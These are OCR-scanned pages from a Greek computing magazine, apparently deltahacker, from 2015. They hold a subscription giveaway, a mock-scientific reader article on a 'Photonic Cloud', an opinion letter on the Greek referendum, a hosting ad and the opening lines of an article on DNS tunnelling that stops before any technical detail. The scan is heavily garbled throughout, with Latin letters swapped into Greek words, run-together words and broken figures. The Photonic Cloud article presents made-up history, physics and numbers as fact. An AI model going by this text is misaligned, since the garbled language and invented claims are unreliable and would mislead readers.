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Αυτό To Mac mini είναι σχεδιασμένο ώστε να κάνει ότι θέλετε - 
και πολλά περισσότερα. 


Αυτό ro Mac mini δεν &tvat ro βασικό μοντέλο, και κοστίζει 1249 ευρώ 
(http://store.istorm.gr/mac/mac-mini/2-8ghz-mac-mini.html). 


Αυτό To Mac mini To κληρώνουμε μεταξύ 25 αναγνωστών µε Jumbo- 
Pack Plus (60 τεύχη). 


Αν η συνδρομή σας πλησιάζει στη λήξη της, αυτό To Mac mini εἶναι 
εξαιρετικά πιθανό να γίνει δικό σας. 


fia va πάρετε µέρος στην κλήρωση, αρκεί va πάρετε κι εσείς Jumbo- 
Pack Plus συμπληρώνοντας κατάλληλα τη φόρμα παραγγελίας στο 
http://deltahacker.gr/pdf12order/#s2. 


Από την ἴδια τη φόρμα παραγγελίας βλέπετε πόσους αναγνώστες 
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Καλή σας επιτυχία! 


/var/log/messages 


Φωτονικό Σύννεφο 


Σηµείωση σύνταξης: To καλοκαίρι που διανύουμε είναι παράξενο — και κάποιοι θα ισχυριστούν 
ότι δεν έχουμε δει τίποτε ακόμα. Κάποιοι ἄλλοι, πάντως, όπως ο αγαπητός κύριος στο 
https://www.facebook.com/o.akratos/videos/66051556074921], είναι προφανές ότι έχουν πλήρη 
επίγνωση γιατοτισυμβαίνεικαι, κυρίως, για το τιάλλο πρόκειταινα συμβεί. Οαναγνώστης µας Πάννης 
Μ, εξάλλου, έχει εντρυφήσει επί μακρόν στο φαινόμενο του Φωτονικού Σύννεφου, το οποίο κατά πώς 
φαίνεται είναι το πραγµατικό αἴτιο για πολλά από τα παράξενα, αξιοθαύμαστα κι αξιοπερίεργα που 
συμβαίνουν γύρω µας. Ευγενικά ο Πάννης μάς ζήτησε να φιλοξενήσουμε άρθρο/µελέτη που συνέταξε 
επί του θέματος. H απάντησή µας ήταν καταφατική — κάτι που αντιλαμβανόμαστε πως τον εξέπληξε 
(ελαφρώς) και ταυτόχρονα τον χαροποίησε. 


Αγαπητοί αναγνώστες, δια του παρόντος άρθρου θα ήθελα να θίξω και, ταυτόχρονα, στο 
μέτρο του δυνατού, να αναλύσω ένα φυσικό φαινόμενο (για πολλούς ακόµα ανεξήγητο) το 
οποίο είχε, έχει και θα εξακολουθεί να έχει ουσιαστικές θετικές επιπτώσεις και συγχρόνως 
δραστικές επιδράσεις σε πολλές πτυχές της καθημερινής µας ζωής. Πα να γίνω πιο 
συγκεκριμένος, θα προσπαθήσω, µε ro αν µη τι άλλο μικρό µου μυαλό, va προσεγγίσω μία 
τεραστίων μεγεθών φυσική διεργασία, η οποία τα τελευταία 125 (τουλάχιστον) χρόνια 
απασχολεί την επιστημονική κοινότητα και όχι μόνο. Θα αναφερθώ, όπως οι περισσότεροι 
από εσάς ήδη φαντάζομαι θα έχετε αντιληφθεί, στην έννοια και στο φαινόμενο του 
ΦΩΤΟΝΙΚΟΥ ΣΥΝΝΕΦΟΥ (εφ εξής θα το ονομάζουμε, δια λόγους συντομίας, ΦΣ). 


Τι είναι όµως ένα ΦΣ; Πώς η ύπαρξη του $> επηρεάζει την ψυχοσωματική µας οντότητα; 
Ποια εἶναι η σχέση του ΦΣ και της Πληροφορικής και εν γένει της βιομηχανίας ΙΤ και πώς 
όλοι αυτοί οι τοµείς αλληλεπιδρούν μεταξύ τους; Δύσκολες ερωτήσεις και προφανώς οι 
απόψεις/απαντήσεις διίστανται. Ωστόσο, στο σηµείο αυτό,γιαναµπορέσουµεναθέσουμεμία 
σωστή βάση ερμηνείας του συγκεκριμένου φαινομένου, θα χρειαστεί να χρησιμοποιήσουμε 
τις γνώσεις µας από την Φυσική Στοιχειωδών Σωματιδίων, τη Θεωρία Πιθανοτήτων και τη 
Ζωροαστρική Φιλοσοφία περί των Αρχών Υπάρξεως των Συμπαντιαίων Νεφών. 


Αλλά ας κάνουμε πρώτα μία σύντομη ιστορική αναδρομή. Οι πρώτες αναφορές για την 
ύπαρξη του φαινομένου του ΦΣ, όπως µας είναι γνωστό σήµερα, βασίζονται στις μαρτυρίες 
ενός γιδοβοσκού, ο οποίος εν έτει 1887, σε éva ορεινό χωριό των Ουραλίων Ορέων, 
διαπίστωσε μία έντονη φωτεινότητα σε ένα σηµείο που απείχε μόλις 127 μέτρα από το 
κοπάδι του που εκείνη τη στιγμή βοσκούσε. O νέος αυτός αφελής κτηνοτρόφος, πλησίασε 
γεμάτος περιέργεια για να δει τι ήταν αυτό το τόσο έντονο φώς που εκχεόταν µέσα από 
μία χαραμάδα. Στην προσπάθειά του να αντικρίσει µέσα από τη σχισμή αυτή την έντονη 
φωτεινότητα, ένιωσε ξαφνικά µία πανίσχυρη ριπή φωτεινών δεσμών να διαπερνά το σώμα 
του καινατον εκτοξεύει προς τα πίσω σε απόσταση 32 µέτρων. Ευτυχώς για καλή του τύχη 
δεν τραυματίστηκε σοβαρά κι όταν ανέκτησε τις αισθήσεις του επέστρεψε µε γοργά βήματα 
στο χωριό, ὥστε να περιγράψει στους συγχωριανούς του όσα είχε βιώσει. 


Έκτοτε πέρασαν 44 χρόνια, όταν το 1931, στο Πανεπιστήμιο του Σικάγο, ένας ερευνητής 
Φυσικός προκάλεσε µία έντονη ékpn&n σε éva υπόγειο εργαστήριο, προσπαθώντας va 
συνθέσει καινούργια στοιχειώδη υψίσυχνα σωματίδια, τα οποία θα είχαν την ιδιότητα να 
αλληλεπιδρούν µόνο µε τις ελκτικές πλανητικές δυνάμεις που εκπορεύονται από την 
σχέση Σελήνης-Γης. Μόλις ο κρότος της έκρηξης καταλάγιασε, éva περίεργο φωτεινό 
σύννεφο κάλυψε τον περιβάλλοντα χώρο του εργαστηρίου απορρυθµίζοντας πλήρως όλες 
τις αναλογικές διατάξεις μετρήσεων που είχε κατασκευάσει ο αγαπητός µας επιστήμονας. 
Όλες οι αναλογικές ενδείξεις μαγνητόµετρων, φασματοφωτόμµετρων κι ανιχνευτών 
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υπεριώδους σε κλάσματα δευτερολέπτου μηδενίστηκαν. Το σύννεφο είχε παρουσία 
εντός του εργαστηρίου για 35 δευτερόλεπτα, οπότε κι εξαφανίστηκε. O Φυσικός ονόματι 
Jorge Louiz de la Cruz Lopez (µε καταγωγή από το Puerto Rico, γόνος φτωχής αγροτικής 
οικογένειας η οποία καλλιεργούσε/εμπορευόταν ινδική κάνναβη σε προάστιο του San Juan 
yta va μπορέσει ναθρέψει τον μικρό Jorge), δημοσίευσε τα βιώµατά του στην ετήσια έκδοση 
ανασκόπησης του περιοδικού Nature, όπου και δέχθηκε τα επικριτικά/αποδοκιµαστικά 
σχόλια της επιστημονικής κοινότητας, δεδομένου ότι μέχρι εκείνη τη στιγµή δεν είχε 
παρατηρηθεί κάποιο αντίστοιχο φαινόμενο σε άλλα εργαστήρια ανά τον κόσµο και οι 
υπόλοιποι Φυσικοί θεώρησαν πως ο συγκεκριμένος συνάδελφος βρισκόταν υπότην επήρεια 
παραισθησιογόνων ουσιών. 


Το 1952 ένας Μαθηματικός ονόματι Abdul Mohammed ΑΙ Ra Maui στο Πανεπιστήµιο του 
Oman, προσπαθούσε να ερμηνεύσει τα σανσκριτικά κείµενα αγνώστου ταυτότητας Ινδών 
συγγραφέων που είχαν εντρυφήσει στον Περσικό Ζωροαστρισμό. Τα συγκεκριµένα κείµενα 
εμπεριείχαν µαθηµατικά αξιώματα που προσπαθούσαν να εξηγήσουν µε πιθανοθεωρητικό 
τρόπο την ύπαρξη ΦΣ, όπως είχε παρατηρηθεί κατά τις θρησκευτικές τελετές του 
Ζαρατούστρα, στα υψίπεδα της αρχαίας πόλης της Μουχάρι Ναχβάντ (µερικά χιλιόμετρα 
απότην σηµερινή Τεχεράνη). Τα κείµενα ανέφεραν την ύπαρξη ενός σύννεφου που εξέπεμπε 
έντονο εκτυφλωτικό φως, κατά τη διάρκεια των τελετών σφαγιασμού της ιεράς αγελάδας 
Carmine προς τιμή του θεού Mam-Ra. 


Κάπως έτσι, αγαπητοί φίλοι, ερχόμαστε στο σήµερα, oro σωτήριο έτος 2015. To $> 
εξακολουθεί να αποτελεί μυστήριο, αντικείµενο έρευνας και συνάμα θαυμασμού από πλήθη 
χιλιάδων ανθρώπων που συνωστίζονται απὀ το 1998 και εντεύθεν στις όχθες του ποταμού 
Al Raya, για να παρακολουθήσουν την εμφάνιση του ΦΣ.Σύμφωναμετις τελευταίες έρευνες, 
στο σηµείο που εκβάλλει ο ποταμός ΑΙ Raya στον Ινδικό Ωκεανό, έχουν μετρηθεί υψηλές 
συγκεντρώσεις ιονισµένων σωματιδίων του στοιχείου Ξένου (Xe) το οποίο, λόγω της 
ιδιομορφίας που παρουσιάζουν οι βαρυτικές ελκτικές δυνάμεις του τριπτύχου Αφροδίτης- 
Γης-Σελήνης κατά τη χρονική περίοδο 12-18 Σεπτέμβρη εκάστου έτους, μεταπίπτει σε 
µία υπερδιεγερµένη κατάσταση µετακβαντικής ενέργειας 2500 x 109? YJ (Yotta Joule = 
10?^Joule), η οποία φτάνει στο peak της ξημερώματα Ίδης προς Ίθης Σεπτέμβρη, περί την 
ώρα 00:35, κατά την οποία παρατηρείται αντιστροφή των γήινων μαγνητικὠν πόλων. Σε 
εκείνη την χρονική στιγµή δημιουργείται μία υπερκρίσιµη μάζα 8500 x 10’ ZKg (Zetta Kilo- 
grams = 10?! Kg), η οποία ενεργοποιείται µε την άφιξη υπερταχέως κινούμενων φωτονικών 
clusters που προέρχονται από τον γειτονικό Γαλαξία της Ανδρομέδας. Αυτή η μεταβατική 
κατάσταση, σε συνδυασμό µε ro ότι ο Ιχθύς μπαίνει στη σφαίρα του Υδροχόου, προκαλούν 
δραματικές εξελίξεις στο συµπαντικό συνονθύλευμα των Ατρειδών (οικογένεια Γαλαξιών 
kat σβησμένων άστρων που απέχουν μόλις 8 x 1085874256 έτη φωτός από τον πλανήτη μας), 
το οποίο διεγείρει εξωσυμπαντικές ηλεκτρομαγνητικές δυνάμεις της 8 διαστάσεως 
του πολυ-χωροχρόνου µε συνέπεια την τρομακτική συσσώρευση ενέργειας σε μία σφαίρα 
διαμέτρου 15cm. H εν λόγω σφαίρα διαστέλλεται µε ρυθµό 2,257 Km/s, δημιουργώντας 
éva τεράστιο σύννεφο ακτίνας 85Km το οποίο εκπέμπει φωτόνια ενέργειας 285475963 x 
1010000002564580 TJ (Terra Joule) προς όλες τις ισοτροπικές κατευθύνσεις. 


Τα αποτελέσµατα και οι επιδράσεις της δημιουργίας του PÈ γίνονται αισθητές σε 
δισεκατομμυριοστά του δευτερολέπτου. Αμέσως υπάρχει ιοντικός διαχωρισμός της 
στρατόσφαιρας από την µεσόσφαιρα, δημιουργώντας βλάβες στις τηλεπικοινωνίες και στα 
ηλεκτρονικά συστήµατα των δορυφόρων. Όλοι οι Η/Υ (φορητοί και επιτραπέζιοι) ανά τον 
πλανήτη υπερενεργοποιούνται από την κρούση των υπερταχέως κινούμενων φωτονίων του 
È eni TWV Motherboards rov μηχανημάτων, ενώταυτὀχροναγίνεταιἐκλειψηΗλίου. Τακινητά 
τηλέφωνα παύουν να λειτουργούν ενώ n εντονότατη λάμψη προκαλεί προσωρινή τύφλωση 
σε κάθε ζωντανό υδρόβιο, επίγειο και ιπτάμενο ov. Τα φωτόνια του ΦΣ, συγκρουόµενα µε 
την κοσμική ακτινοβολία που προέρχεται από τα ακροτελεύτια σύνορα του εντός, εκτός κι 
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επί T αυτά υπερπαράλληλου υβριδοποιηµένου Σύμπαντος, έχει ως συνέπεια τη μετατόπιση 
του άξονα της Γης κατά {8 προκαλώντας την εξύψωση (σωματική και πνευματική) κάθε 
ζωντανού οργανισμού που κατοικεί σε αυτόν τον πλανήτη κι όχι µόνο. 


Όπως αντιλαμβάνεστε φίλοι µου, αυτή είναι η βασικότερη συνθήκη/αρχή/προὐπόθεση 
ώστε το συμπαντικὀ ισοζύγιο να γίνει προστοθετικό (για πολλούς ο όρος καλείται 
εμπροστοθετικό) και να υπάρξει αποσυμπίεση της υπάρχουσας συμµπιέσεως στον τρίτο 
παράλληλο του ζωδιακού κύκλου. 


Θα ρωτήσει ωστόσο κάποιος, πώς όλα αυτά συνδέονται µε την εμφάνιση του ΦΣ στα 
Ουράλια Όρη, στο εργαστήριο του Jorge και στα υψίπεδα της Μουχάρι Ναχβάντ. Μα, η 
απάντηση εἰναι εντελώς προφανής και πασιφανής ταυτοχρόνως. H τεράστια σφαίρα 
διασπάται σε πολλές αμέτρητες μικρότερες σφαίρες (σφαιροειδή συννεφάκια φωτονίων), 
οι οποίες διασπείρονται σε όλα τα μήκη και πλάτη της υδρόβιου σφαίρας µας. Έτσι, αυτά τα 
μικρά συννεφάκια φωτονίων μπορούν να βρεθούν σε οποιοδήποτε σημείο του πλανήτη µας 
προκαλώντας ρίγη δέους, συγκίνησης και θαυμασμού σε κάθε ἐμψυχο ÓV. 


Στο σηµείο αυτό θα ήθελα va εστιάσω κυρίως στην αμοιβαία σχέση που υπάρχει μεταξύ IT 
και ΦΣ. Είναι σαφές κι αποδεδειγµένο πως η σύγχρονη τεχνολογία υπολογιστών (σε επίπεδο 
hardware) και η επιστήμη της Πληροφορικής (σε επίπεδο software) βασίζονται -και για να 
είμαι πιο ακριβής και ουσιαστικός, εκπηγάζουν-- από την αέναη κίνηση των φωτονίων των 
επιµέρους ΦΣ που προέρχονται από τη διάσπαση του μεγάλου ΦΣ πάνω από τον ποταμό ΑΙ 
Raya. H ενέργεια που εκλύεται από κάθε φωτόνιο που εκπέμπεται από το εκάστοτε μικρό 
ΦΣ είναι αρκετή για να υπερδιεγείρει τα συστήµατα των υπολογιστών µας καινατους κάνει 
να τρέχουν σε ασύλληπτα υψηλές συχνότητες. Οτελευταίος super-computer µε τροφοδοσία 
ενέργειας απὀ τα μικρά ΦΣ λειτουργεί σε συχνότητα 8564257 x 10200500 7Hz (Zetta Hertz, 
θυμίζω 10?) καθιστώντας τον éva ιδιαίτερα χρήσιμο εργαλείο στον υπολογισμό της 
μέτρησης των ταχυτήτων όλων των υποατομικώὠν σωματιδίων που παράγονται στους ac- 
celerators σωματιδίων. Όμως η µεγάλη πρόοδος έχει συντελεστεί στον τοµέα rou software. 


Εδώ αγαπητοί µου φίλοι, θα μπορούσα να γράψω αμέτρητες σελίδες για ro πώς επιδρά 
το ΦΣ στη δηµιουργία νέου software. H απάντηση όµως είναι και πάλι απλή. Θυμηθείτε 
ανωτέρω, την ψυχοσωματική εξύψωση των ζώντων οργανισμών. Na προχωρήσω κι 
άλλο; Προφανώς η εξύψωση/αναβάθµιση (uplift/upgrade) των πνευματικων/σωματικών 
λειτουργιών/ικανοτήτων των συναδέλφων IT experts -καικυρίως εκείνων που ασχολούνται 
HE το γράψιμο κωὠδικα-, τους μετατρέπει σε καινοτόμους/πρωτεργάτες στη δηµιουργία 
νέων γλωσσών προγραμματισμού. H επίδραση των φωτονίων rou ΦΣ τους μεταφέρει σε μία 
εξω-διαστασιακή χωροχρονικοτήτα, στην οποία μπορούν να παράγουν και να δημιουργούν 
never-seen-before innovative products στο χώρο του software. 


Ἠδη οκβαντικός τηλεμεταφορέας είναι, πρακτικά, γεγονός, όταν semi-working-proof-of-con- 
cept παρουσιάστηκε στη διεθνή έκθεση προϊόντων υψηλής τεχνολογίας που διοργανώνεται 
κάθε χρόνο στην Τεχεράνη, προς τιµή της αρχαίας πόλης Μουχάρι Ναχβάντ στην Περσία. 
Στο παρόν άρθρο έγινε µία προσπάθεια προσέγγισης αυτού του υπέρτατου φαινομένου, στο 
οποίο έχει βασίσει τόσο πολύ τις ελπίδες του ο σύγχρονος πολιτισμός του ανθρώπου. Av 
κάποιος από τους φίλτατους συναδέλφους αναγνώστες βιώσει την πνευματική-σωματική 
εμπειρία της επίδρασης ενός ΦΣ, παρακαλώ πολύ όπως τη μεταφέρει σε επόμενο τεύχος 
του αγαπημένου µας περιοδικού. 

Είμαι στη διάθεσή σας για οποιαδήποτε πληροφορία ή διευκρίνιση. 

Με φιλικούς εγκάρδιους χαιρετισμούς, 


Γιάννης, ο ek ToU Φωτονικού Συννέφου ορμώμενος” Χαμουραμπί. 


Nwe roaa rike ασφαλής; 


| 
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Αγαπητοί µου, ga x 

Καθισμένος μπροστά. στην γραφομηχανή σήμερα, δεύτερη pépa του επομένθ 
απὀ τον περασμένο μήνα, οφείλω να ομολογήσω κάτι. 

Αυτή τη φορά δεν ἤθελα να σας γράφω. To δεμυστηρεύτηκα στον ανιφνό τις 
προάλλες (όταν ανακοινώθηκε το δημοφήψίσμα) αλλά, αυτός µε πήρε µε τις πέ- 
τρες. ' 4 

Απομλείεταν, µου λέει. θα γράφεις. 

Tv να γράφω βρε παιδιά: Tv μπορώ να προσθέσω εγώ στην όλη κουβέντα; 

Κανείς δεν συζητάει. Όλον διακηρύσσουν καν επιυκρίνουν. Συζήτηση μηδέν. 

Στεναχωριέμαι yv. αυτό. Με θλίβει απίστευτα η απροθυμία (ή ανικανότητα») 
για πραγματικό debate, που βλέπω παντού γύρω µου. 

θυμάμαι κάπονα στιγµή πόση εντύπωση μου είχε κάνεν όταν είχα ακούσει 
για τη διδασκαλία debate, στα μεγάλα πανεπιστήµνα στην Αγγλία και στις 
ΗΠΑ. Καλείσαι να υποστηρίξεις PLAV άποφη, ακόμα καν αν δεν την πιστεύεις 
(προσωπικά) καν να συζητήσεις µε κάποιον που υποστηρίζει την αντίθετη. Κα- 
λείσαν να απούσεις, να βρεις επιχειρήματα, και να αντικρούσεις αυτά που λέεν 
ο συζητητής σου. «Ακόμα και αν διαφωνείςΧ. 

Κάτν σαν τον συνήγορο του διαβόλου, ένα πράγµα. 

Έτσι μαθαίνουν να σκέφτονται ον κοντόφραγκου, τν νομίζατε: 

Λοιπόν, να γράφω γνα το δημοφήφισμα, όπως µε προτρέπει O ανιφιός, αλλά 
τν να πω; Να σας πω τι να φηφίσετε; 

Δεν θα το πάνω. 

Πώς να το κάνω, δηλαδή; Κοιτάω το ερώτημα. 

Σον λέει ο ένας: To ερώτημα στην πραγματικότητα είναν yla το ευρώ. Ναι ἡ 
όχν στο ευρώ. 

Όχν, σου λέεν ο άλλος. To ερώτηµα είναν αυτό που είναν. Σαφές καν συγκε- 
πριμµένο. Ῥωτάει κάτν και απαντάς σε αυτό. ΝΑΙ ἡ OXI. 

Σκέφτομαι, λοιπόν, εγώ. Αν εἶναι σαφές και συγχεκρυμένο, πονες είναν ον 
συνιστώσες του; (No pun intended.) Ληλαδή αν ὠηφίσω ΝΑΙ θα εφαρμοστεί η 
πρόταση blablabla; 

"Καν. Γι αυτό να ᾠηφίσεις ὀχι. ΟΧΙ στους εκβιασμούς." 

Να ρε παιδιά, η πρόταση blablabla δεν υπάρχεν. Έχει αποσυρθεί. Δεν 
υπάρχει καμία πρόταση προς συζήτηση. 

"Ναι, βέβανα, το ερώτημα civar συμβολικό. Επιλέγοντας NAI ἡ ΟΧΙ εκφέρεις 
γνώμη γνα την περαιτέρω πορεία των πραγμάτων." 

A, ΟΚ then. Οπότε έχουν δίκιο όσοι λένε πως το ερώτημα είναν για το ευρώ. 

"Μα ὀχν, δεν εἶναι." 

Μα ναι, είναν, τουλάχιστον έτσι λένε ον Ευρωπαίου. O Γιούνγκερ. O Ολάντ. O 
Ῥαχόν. E Μέρκελ. 

"Μην τους ακούς. Μας εκβιάζουν. Παρεμβαίνουν στα εσωτερικά της χώρας 
pag." 

T. παρεμβαίνουν; To να µας πουν πώς θα εκλάβουν την επιλογή µας είναν 
παρέμβαση; Δεν θα έπρεπε να είναι µέρος της ερώτησης; 


Σνέιλ μέιλ 


"Καν γνατί να µας πουν πώς θα την εκλάβουν»" 

Για να καταλάβω εγώ, που καλούμαι να επιλέξω, πονες είναν ον επιπτώσεις. 

"Θα τις δεις τις επιπτώσεις αν περάσεν το ΝΑΙ, και θα δεις τα µέτρα που θα εφαρμοστούν." 
ΟΚ. Καν αν περάσεν το OXI, πονα µέτρα θα εφαρμοστούν τότε; 

"θα δούμε. θα συζητήσουμε." 


Καν yati να υποθέσω πως θα συζητήσουμε τώρα πιο δημιουργικά, όταν τόσο καιρό δεν συζητού- 
dape τίποτα: 


"Γνατί τώρα θα έχεν αποφανθεί ο λαός." 

Ἐπί ποίου πράγματος» Αφού η πρόταση δεν υφίσταται. 

"Επί της κατεύθυνσης." 

Μα επ' αυτού αποφάνθηκε ήδη ο λαός, το Γενάρη. H κάνω λάθος; 

KAN κ.λπ. 

Βλέπετε, αγαπητοί μον, ÓTL κάνουμε κύκλους. Μας ρωτάνε κάτι χωρίς να µας εξηγούν γνατί το pw- 
TÉVE και τν θα κάνουν µε την απάντησή μας. 


Αυτός είναν καν O βασικότερος λόγος που κατά τη γνώμη μου το δηµοφήφισμα αυτό αποτελεί 
εκτροπή. Αντιδημοκρατιυκῇ απόκλιση. 


Αλλά υπάρχει καν το άλλο. 

Πέντε μήνες τώρα η ελληνική πλευρά "διαπραγματενόταν". Επί πέντε μήνες δεν κουνιόταν φύλλο, 
γνατί περιμέναμε να αποποµίσουµε κάτι απὀ αυτούς που τους χαρακτηρίζουμε εχβιαστές, γερμανό- 
δουλους, τοκογλύφους X.Xt. 

Στο μεταξύ η οικονομία της χώρας έχεν γίνει σαν τον γάνδαρο του χότζα, που πάνω που τον µά- 
θαμε να ζει χωρίς να χρειάζεταν να τρώει, αυτός ᾠόφησε. 

Αυτό δε το λέω για αστείο, αγαπητοί µου. 

θα θυμάστε, ίσως, την πρόσφατη συζήτησή µου µε τον Ko Αρχισυντάκτη,. 

Έγραφα, γνα σας σας σκανδαλίσω λίγο, πως η εργατική τάξη δεν υφίσταται εκτός καπνταλιστικού 
τρόπον παραγωγής. Οὐτε ον διεκδικήσεις της. θα αυτοκαταργηθούν όταν θα έρθει η αταξική ποινωνία 
whatever. 

Ας επανέλθω λίγο σ' αυτό. Σύμφωνα µε την μαρξιστική θεωρία περί αξίας, αξία παράγεταν µόνο 
µέσω της ανθρώπινης εργασίας. Στον καπιταλιστικὀ τρόπο παραγωγής ον εργάτες νονκιάζουν το χρό- 
νο τους καν προσφέρουν την εργασία τους στον παπιταλιστή. To προϊόν που παράγουν δεν τους ανή- 
κεν. To κόστος της εργασίας τους ανεβάζει κατά τν την τιµή του τελικού προϊόντος. H αύξηση αυτή 
αντιπροσωπεύεν το κόστος της ενοικίασης του χρόνου του εργάτη. 

Τώρα, η διαφορά ενός εργάτη µε ένα μηχάνημα είναι το ότι η παραγωγικότητα του μηχανήματος 
είναν δεδομένη. To κόστος που προστίθεται στην τυμή του προϊόντος είναν το κόστος απόσβεσης της 
τυμής του μηχανήματος. Στο τέλος μηδενίζεται -- όπως μηδενίζεται και το σχετικό σου πλεονέκτημα, 
ως παπιταλιστή, όταν όλον ον ανταγωνιστές σου επενδύσουν στο ἴδιο ἡ σε κάποιο άλλο αντίστοιχο 
μηχάνημα. Αντίθετα, το κόστος της ανθρώπινης εργασίας δεν µπορεί ποτέ να µηδενιστεί. Μπορεί όμως 
να αυξηθεί η παραγωγικότητα. To κόστος της εργασίας είναι δηλαδή δεδομένο, αλλά το παραγόμενο 
xpoióv Óxv. 

Επίσης: Υπάρχεν µια διαφορά μεταξύ του κόστους 
της εργασίας όπως έχεν ενσωματωθεί στην 
τιμή του προϊόντος, από το κόστος της 
εργασίας όπως έχεν αποδοθεί στον εργά- 
τη. Αυτή η διαφορά ονομάζεται υπεραξία. 
Δηλαδή, παραπάνω αξία. Πληρώθηκες τόσο, 
αλλά παρήγαγες τόσο συν κάτι. 

Εξ ου καν η πάλη των τάξεων XM. x.t. 
Χ.λπ. (Καν ιδού γιατί λέω ότι εργατική τάξη 
υφίσταταν μόνο εντός τον κυρίαρχου µο- 
ντέλον παραγωγής.) 

Απλά µαθήµατα μαρζιστικῆς θεωρίας. 

Τώρα, επί του συγκεκριμένου. 

H Ελλάδα χρωστάει τα κέρατά. της. Λένε 
όλον ότι πρέπει να έρθει η ανάπτυξη, αλλιώς 
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σνένλ. μόνλ 


. VHAGOKER 


δεν θα δούμε χαΐρι. Μέχρν καν ο Σύριζας, αυτό µας λέεν. 

Αυτό που δεν µας λένε σαφώς, όμως, είναν το τν εστί "ανάπτυξη". Ανάπτυξη 
ἔρχεταν όταν παράγεται υπεραξία, δηλαδή όταν υπάρχει παραγωγή, δηλαδή 
όταν έχουν γίνει επενδύσεις. 

Τις επενδύσεις τις κάνουν ον "καπινταλιστές". Φτιάχνουν εργοστάσια, προ- 
σλαμβάνουν εργάτες, παράγουν προϊόντα, τα πουλούν, εισπράττουν υπεραξία. 
Έχουν κέρδος. 

Αυτά είναν κουκιά μετρηµένα. Παντού έτσι γίνεται. Παντού. Στην Αμερική. 
Στη Γερμανία, Στη Λαϊκή Δημοκρατία της Κίνας. 

To σηµαντικό πον πρέπει να θυμάται κανείς είναι πως αν δεν παράγονταν 
προϊόντα δεν παράγεται αξία, «ρα δεν υπάρχει ανάπτυζη. 

Έχουμε τώρα την κυβέρνηση του Σύριζα που προσπαθεί να αποκομίσει την 
καλύτερη δυνατή συμφωνία γν' αυτούς που έχουν υποφέρει στην Ελλάδα, καν 
Βλέπουμε πως στην προσπάθειά του να το κάνει αὐτό πνίγει κάθε προσπάθεια 
που γυνόταν εκ των ενόντων γνα να κουνηθεί λίγο η ονκονοµία. 

Δεν θα μπω στην αποπροσανατολιστική συζήτηση γνα το αν έπρεπε να επα- 
ναπροσληφθούν ον παθαρίστριες ἡ να αρθεί η διαθεσιμότητα των σχολικών 
φυλάκων. 

To ερώτημα που µε απασχολεί εμένα είναν το εξής: 

Πόσο καλό νομίζεις ότι κάνεις στην χώρα σου, όταν στην προσπάθειά σου 
να αποτρέφεις ἡ να αναστρέφεις την εξαθλίωση πον µας έφεραν τα "μνημόννα", 
καταστρέφεις ὁ,τι είχε μείνεν να κουνιέταν, καν εμποδίζεις έμπρακτα την ευ- 
καιρία να κουνηθεί κάτι άλλος 

Όταν καταστρέφεις την επιχειρηµατικότητα. 

Αυτά γνα πολλούς συντρόφους του Σύριζα είναν φιλά γράμματα, γνα να µην 
πω ανάθεμα. 

Λόγω αυξημένης ταξικής εναισθησίας, ον σύντροφον αδιαφορούν για το αν 
θα καταφέρει τελικά να έρθεν ο καπνταλιστής να ανοίξει εργοστάσιο. Ον σύ- 
ντροφοιν εἶναι ταξικοί εχθροί του κπαπιταλιστή. Αν μπορούσαν θα του έβαζαν 
έκτακτη εισφορά IZ% παν µετά θα τον έκλευναν στο αμπάρν. 

Όμως ο καπιταλιστής δεν έχει καμία πρεμούρα να έρθει κατά 'δω. Πάει καν 
στην Τουρκία, ápa λάχεν. Ἡ στη Βουλγαρία. 

Οπότε τι κάνουμε εμείς» 

H Ἰρόνκα, όπως καν ο Μαρξ, ξέρει πως αξία παράγεται µόνο δια της ανθρώ- 
πινης εργασίας. Ξέρει πως τα δανεικά δεν είναι παραγωγή αξίας. Προσπαθού- 
σε, λοιπόν, να κάνει τις επενδύσεις στην Ελλάδα ελκυστικές. Με διαρθρωτικές 
αλλαγές. 

ΟΚ, αυτό δεν το θέλαμε. Ῥηφίσαμε όλον τον Σύριζα. 

Tov ᾠηφίσαμε, αλλά απάντηση στο ερώτημα "ποιος θα παράγει αξίες στην 
Ἑλλάδα του εγγύς μέλλοντος:" δεν έχουµε ακόµα λάβει, 

Ακόμα καν να σβήσουν όλο το χρέος, ακόµα Χαν να µην κόφουν καμία πρό- 
WPN σύνταξη, ακόµα και να µην αυξήσουν κανέναν ΦΠΑ στα νησιά καν στα κορ- 
φοβούνια, αν δεν έχεις διασφαλίσει ότι κάπονος θα παράγει αξίες έχεις χάνει 
μνα τρύπα στο νερό. Αν στο τρέχον μοντέλο παραγωγής, το καπιταλιστικό ντε, 
εσύ έρχεσαν σε ρήξη καν Χλείνεις τις τράπεζες, αντί να δημνουργήσεις το περι- 
βάλλον εκείνο ώστε να παράγονταν αξίες, τότε το μόνο που καταφέρνεις εἶναι 
να βλάπτεις τη χώρα σου KAL να υποσκάπτεις κατά θεμελιώδη πλέον τρόπο το 
ορατό της μέλλον. 

Τνα να το πω και πιο απλά. 

Σύντροφε, πάμε µνα χαρά. O γάιδαρος κοντεύεν να συνηθίσεν χωρίς φαΐ. Πώς 
προχωράμε τώρα; 


Σας ασπάζοµαι, 
θείος Ακάκιος 


— — ^ 
DigitalOcean 


Ταχύτατα VPSes στο cloud, σε hosts µε δίσµους SSD. 
Επιβογή datacenter σε Ευρώπη, Αμεριµή μαι Ασία. 
Lean-mean control panel, για απόῆυτο éneyxo. 


Αποητήστε τώρα το δικό oas VPS, 

στο cloud της DigitalOcean. 

Κάντε KAIK στο http://bit.ly/digocean10off 
και µερδίστε αυτομάτως 105 oe credit. 


Hint: Επιβέγοντας το µιμρό πϑάνο, 

πάντα µε KAIK στο http://bit.ly/digocean10off, 
ουσιαστιµά έχετε δύο µήνες δωρεάν για ένα VPS 
pe 512MB RAM, 20GB SSD μαι 1TB transfer. 


mH Δεν είναι RI ἄσχημα 


Skill: Advanced 
Tags: DNS tunnel, authoritative name server, glue records 


Δικτυακή Κερκόπορτα 


Μια µικρή και ταπεινή πορτούλα µπορεί να οδηγήσει στην άλωση ενός 
συστήµατος που μοιάζει απόρθητο. Δεν εἶναι δύσκολο να την σφραγίσει κανείς, 
αλλά είναι πολύ πιο εύκολο va την ξεχάσει ανοιχτή. Μπορείτε va µαντέψετε σε 
ποια πόρτα αναφερόμαστε; Κατά πάσα πιθανότητα ὀχι - κι αυτός είναι ο λόγος 

που την καθιστά τόσο επικίνδυνη. 


του Παναγιώτη Βαρελά 


Λίγες δραστηριότητες προσφέρουν τόση χαρά και ικανοποίηση, όσο η ολοκλήρω- 
ση µιας επίθεσης. Αυτό δεν φανερώνει κάποια ροπή προς τον βανδαλισμό. Μιλάμε 
